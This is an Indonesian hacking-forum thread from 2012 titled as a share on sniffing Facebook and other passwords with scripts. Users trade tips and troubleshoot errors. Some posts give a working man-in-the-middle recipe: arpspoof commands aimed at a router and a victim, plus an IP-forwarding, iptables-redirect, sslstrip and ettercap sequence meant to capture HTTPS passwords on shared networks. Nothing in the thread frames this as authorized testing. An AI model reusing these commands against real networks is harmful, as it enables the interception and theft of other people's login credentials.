Thread Closed
[Share] Sniffing password FB dkk dengen script
cara betulinnya gimana om?! kok tulisan nya sering keluar 'SEND L3 ERROR'?!

izin lihat ya bro...
masih baru neeee....

(03-24-2012, 01:40 PM)akayama Wrote: Buat kawan2 yg tau gw mau nanya nich... Sniffer lain yg ada di backtrack 5 R2, selain ettercap dan wireshark... N Cara menggunakannya... ??

selain ettercap dan wireshark bisa gunakan tcpdump atau snort

(04-02-2012, 01:47 PM)japz_krist Wrote: cara betulinnya gimana om?! kok tulisan nya sering keluar 'SEND L3 ERROR'?!

pake backtrack versi berapa om ?
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only

(04-08-2012, 12:09 PM)zee eichel Wrote:
(03-24-2012, 01:40 PM)akayama Wrote: Buat kawan2 yg tau gw mau nanya nich... Sniffer lain yg ada di backtrack 5 R2, selain ettercap dan wireshark... N Cara menggunakannya... ??

selain ettercap dan wireshark bisa gunakan tcpdump atau snort

(04-02-2012, 01:47 PM)japz_krist Wrote: cara betulinnya gimana om?! kok tulisan nya sering keluar 'SEND L3 ERROR'?!

pake backtrack versi berapa om ?

backtrack 5 r2 32 bit yg gnome...mohon pencerahan om...

Ane dulu Sering sniffing di jaringan mikrotik n berhasil dengan cara arpspoof 2x pertama arpspoof -i interface ip_router ip_target n arpspoof -i interface ip_target ip_router.... tp sekarang udah gk bisa klo di mikrotik yg terbaru........

SEND L3 ERROR nya udh bener,tp koq g bs dapet dari https ya om?!
kalo http bisa terus,tp tiap coba https g dapet2...
mohon dibales n diberi solusi dong...

(04-17-2012, 11:30 PM)japz_krist Wrote: SEND L3 ERROR nya udh bener,tp koq g bs dapet dari https ya om?!
kalo http bisa terus,tp tiap coba https g dapet2...
mohon dibales n diberi solusi dong...

coba pelajarin sslstrip Smile

ada usulan sumber g?!
udah baca2 tp ttp aja g bs dapet password https nya...

echo '1' > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000
sslstrip.py -a -w passwd
arpspoof -i eth0 192.168.1.1
ettercap -T -q -M arp -i eth0 // //

itu code yd dipake...

ko ane keluarnya gini yah???

[email protected]:~$ driftnet: pcap_open_live: SIOCGIFHWADDR: No such device

mohon bimbingannya.
Security awareness should be the continuing practice of a skill and not the continuous reminder of a threat.

aku coba di bt-5r2 ko keluarnya gini ya??

driftnet: pcap_open_live: SIOCGIFHWADDR: No such device

mohon pencerahannya...
Security awareness should be the continuing practice of a skill and not the continuous reminder of a threat.


Thread Closed


Users browsing this thread: 2 Guest(s)